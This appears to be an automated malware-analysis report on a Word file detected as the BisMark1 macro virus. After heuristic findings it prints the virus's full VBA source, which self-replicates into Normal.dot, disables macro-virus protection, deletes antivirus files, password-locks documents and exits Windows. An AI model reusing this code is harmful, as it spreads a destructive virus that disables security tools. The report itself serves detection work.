Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa568495661c401b…

MALICIOUS

Office (OLE)

57.0 KB Created: 1997-04-27 09:49:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 0b88fa4dcc58d5e009e574c6b1b46494 SHA-1: d4d501bc361d3743ab1df28d6981612b6da48352 SHA-256: fa568495661c401bcc279f9e0d8009c2868fb35e49845e9fd4d65e84194012e5
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains legacy WordBasic macro virus markers and VBA macros, including an AutoOpen subroutine. The AutoOpen macro attempts to copy itself to the Normal.dot template and the current document, indicating a propagation mechanism. The ClamAV detection 'Doc.Trojan.Bismark-1' strongly suggests a known malware family, though specific details are limited.

Heuristics 5

  • ClamAV: Doc.Trojan.Bismark-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bismark-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5423 bytes
SHA-256: 6897c2107212057baf9cfe80cd4e14494a761149fb276471d4fa9f417179e67a
Detection
ClamAV: Doc.Trojan.Bismark-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "BisMark"
Sub AutoOpen()
    On Error GoTo BisMark

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
      
    SetAttr "c:\program files\microsoft office\templates\normal.dot", vbNormal

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    documentinstalled = False
    Globalinstalled = False

    For I = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "BisMark" Then
            documentinstalled = True
        End If
   Next
  
   For J = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "BisMark" Then
            Globalinstalled = True
        End If
    Next

    If documentinstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
        
    End If

    If Globalinstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
        
    End If

    Application.DisplayAlerts = wdAlertsAll

BisMark:
BisMark
End Sub
Sub BisMark()
On Error GoTo BisMark
Application.StatusBar = True
StatusBar = "BisMark1 WMV97"
Application.Caption = "BisMark1 WMV97"
With ActiveDocument
.BuiltInDocumentProperties(wdPropertyTitle) = "BisMark1"
.BuiltInDocumentProperties(wdPropertySubject) = "Word Macro Virri"
.BuiltInDocumentProperties(wdPropertyAuthor) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyManager) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyCompany) = "Virii Productions"
.BuiltInDocumentProperties(wdPropertyComments) = "This Word Macro Virus was Made By Talon"
End With
If WeekDay(Now()) = 4 And Hour(Now()) = 12 Then
AutoCorrect.Entries.Add Name:="the", Value:="Word Macro Virus BisMark1, Written By Talon"
Else
End If
BisMark:
End Sub
Sub ToolsMacro()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark1"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub Toolscustomize()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark1"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub ViewVBcode()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark1"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub FileSave()
On Error Resume Next
Kill "c:\program files\norton antivirus\Virscan2.dat"
Kill "c:\vdoc\*.*"
Kill "c:\f-prot\*.*"
Kill "C:\program files\antiviral toolkit pro\*.*"
ActiveDocument.Save
End Sub
Sub FileClose()
On Error GoTo BisMark

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    documentinstalled = False
    Globalinstalled = False

    For I = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "BisMark" Then
            documentinstalled = True
        End If
   Next
  
   For J = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "BisMark" Then
            Globalinstalled = True
        End If
    Next

    If documentinstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
        
    End If

    If Globalinstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
        
    End If

    Application.DisplayAlerts = wdAlertsAll

BisMark:
ActiveDocument.Close
End Sub